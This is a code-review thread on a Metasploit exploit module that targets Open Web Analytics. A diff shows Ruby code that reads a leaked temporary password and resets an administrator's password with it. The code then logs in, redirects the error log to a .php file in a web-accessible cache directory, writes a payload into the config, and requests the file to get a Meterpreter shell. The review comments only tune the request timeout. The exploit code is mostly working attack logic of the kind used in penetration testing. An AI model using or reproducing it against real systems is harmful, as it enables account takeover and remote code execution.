modules/exploits/multi/http/open_web_analytics_rce.rb

```diff
@@ -0,0 +1,268 @@
+    end
+
+    cache_temppass = get_cache_temppass(cache)
+    print_good("Found temporary password for user '#{username}': #{cache_temppass}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.usersPasswordEntry'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_password' => new_password,
+        'owa_password2' => new_password,
+        'owa_k' => cache_temppass,
+        'owa_action' => 'base.usersChangePassword'
+      }
+    )
+
+    if res && res.code != 302
+      fail_with(Failure::UnexpectedReply, 'An error occurred when changing the user password!')
+    end
+    print_good("Changed the password of '#{username}' to '#{new_password}'")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => new_password,
+        'owa_action' => 'base.login'
+      }
+    )
+
+    redirect = res['location']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => URI(redirect).path
+    )
+    if res && res.code == 200
+      print_good("Logged in as #{username} user")
+    else
+      fail_with(Failure::UnexpectedReply, "An error occurred during the login attempt of user #{username}")
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
+    )
+
+    shell_filename = "#{rand_text_alphanumeric(8)}.php"
+
+    nonce = get_update_nonce(res)
+    log_location = 'owa-data/caches/' + shell_filename
+    register_file_for_cleanup(shell_filename)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[base.error_log_file]' => log_location,
+        'owa_config[base.error_log_level]' => 2
+      }
+    )
+    fail_with(Failure::Unreachable, 'An error occurred when attempting to update config!') unless res && res.code == 302
+    print_status('Creating log file')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[shell]' => payload.encoded + '?>'
+      }
+    )
+    fail_with(Failure::Unknown, 'An error occurred when attempting to update config!') unless res && res.code == 302
+    print_good('Wrote payload to file')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
```

Comment:
I noticed that, after the session is established, the module hangs for a few seconds before the Meterpreter session gets available to the operator. It looks like this last request doesn't return and the HTTP client keeps waiting for a response. The default timeout is set to [20 seconds](https://github.com/rapid7/metasploit-framework/blob/c2c5c0c339e4351ad939df780abae0a0ebbcd23f/lib/msf/core/exploit/remote/http_client.rb#L428) and this can be customised when calling `send_request_cgi`:
```suggestion
      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}"),
      timeout: 3
```
Decreasing the timeout value should reduce the time between when the session is established and when it becomes available. If you add this, please, make sure it still works in your environment.

Reply:
Updated. I choose an even lower `timeout` value of `1`, as the session gets available almost immediately and the exploit still works in my environment, locally as well as with HTTPS over the internet on a dedicated server.